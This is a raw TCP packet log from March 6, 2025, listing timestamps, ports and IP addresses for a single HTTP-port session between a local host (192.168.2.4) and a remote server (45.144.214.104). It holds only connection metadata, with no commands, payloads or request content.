Mar 6, 2025 07:06:14.459060907 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.459079981 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459093094 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.459115982 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459155083 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459204912 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.459517002 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459561110 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459569931 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459595919 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459604025 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.459614038 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459625959 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.459631920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459650040 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.459656954 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.460480928 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460506916 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460525990 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460541010 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.460544109 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460555077 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.460561991 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460577965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460596085 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.460608959 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.460629940 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.461368084 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461385965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461410999 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461421967 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.461427927 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461463928 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461464882 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.461481094 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461497068 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.461503983 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.461535931 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.462354898 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.462371111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.462385893 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.462430000 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.589526892 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589600086 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589637995 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589674950 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589730024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589782953 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589782953 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.589782953 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.589818954 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589852095 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.589871883 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589906931 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589941978 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589957952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.589977980 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.589988947 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590013981 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590048075 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590082884 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590096951 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590118885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590128899 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590153933 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590192080 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590226889 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590238094 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590264082 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590275049 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590303898 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590338945 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590373039 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590384007 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590420961 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590687037 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590722084 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590758085 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590791941 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590806007 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590827942 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.590838909 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.590868950 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591021061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591064930 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591074944 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591120958 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591128111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591181993 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591237068 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591273069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591281891 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591308117 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591317892 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591344118 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591377974 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591413021 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591423988 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591448069 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.591458082 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.591485023 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592365980 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592420101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592422962 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592458963 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592468023 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592494965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592530966 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592565060 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592576981 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592602015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592609882 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592636108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592674971 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592710018 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592724085 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592746019 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592755079 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.592792034 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.592959881 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593008995 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.593014956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593051910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593060970 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.593364000 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593400002 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593436956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.593446016 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.593481064 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.682475090 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682580948 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682616949 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682655096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682693005 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682727098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682763100 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682805061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682838917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682841063 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.682841063 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.682841063 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.682873011 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682881117 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.682908058 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682944059 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.682981014 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.683015108 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.683051109 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.683084965 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.683104038 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.683104038 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.683104992 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.683121920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.683182001 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721265078 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721309900 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721426964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721465111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721501112 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721538067 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721591949 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721597910 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721626043 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721663952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721663952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721663952 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721682072 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721767902 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721805096 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721839905 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721873999 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721873045 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721905947 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721908092 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721915007 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.721942902 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.721982956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722018003 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722031116 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722053051 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722063065 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722089052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722125053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722167969 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722194910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722239971 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722259045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722311974 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722352028 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722388029 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722395897 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722440004 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722444057 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722481012 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722516060 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722553968 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722559929 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722585917 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722601891 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722620964 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722659111 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722701073 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722707033 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722754002 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722758055 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722846985 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722901106 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722938061 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722948074 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.722975016 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.722980976 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723010063 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723046064 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723079920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723089933 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723115921 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723123074 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723150015 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723193884 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723238945 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723248005 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723303080 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723318100 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723354101 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723387957 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723422050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723433018 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723457098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723472118 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723494053 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723529100 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723563910 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723572016 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723611116 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723769903 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723804951 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723839045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723886967 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723872900 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723932028 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.723941088 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.723977089 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724011898 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724047899 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724055052 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724096060 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724206924 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724273920 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724353075 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724401951 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724407911 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724442959 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724456072 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724478960 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724530935 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724566936 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724577904 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724602938 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724608898 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724638939 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724674940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724709988 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724720955 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724744081 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724754095 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724778891 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724814892 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724848986 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724858046 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.724888086 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.724895000 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725164890 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725218058 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725270033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725274086 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725306988 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725318909 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725361109 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725426912 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725461006 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725470066 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725506067 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725506067 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725560904 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725595951 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725630045 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725641966 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725667953 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725686073 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725703001 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725739956 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725774050 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725786924 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725810051 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.725816011 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.725846052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.727731943 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.769501925 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769629955 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769718885 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769758940 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769814968 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769850969 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769860029 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.769860029 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.769886017 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769921064 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769957066 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.769992113 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770028114 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770051956 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770051956 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770085096 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770102024 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770138025 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770153046 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770173073 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770207882 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770242929 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770273924 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770277977 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770301104 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770333052 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770371914 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770391941 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770406008 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770442009 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770473003 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.770493984 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.770522118 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.811659098 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811717033 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811755896 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811789989 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811825991 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811862946 CET	80	49733	45.144.214.104	192.168.2.4
Mar 6, 2025 07:06:14.811956882 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.811958075 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.811958075 CET	49733	80	192.168.2.4	45.144.214.104
Mar 6, 2025 07:06:14.852190971 CET	80	49733	45.144.214.104	192.168.2.4
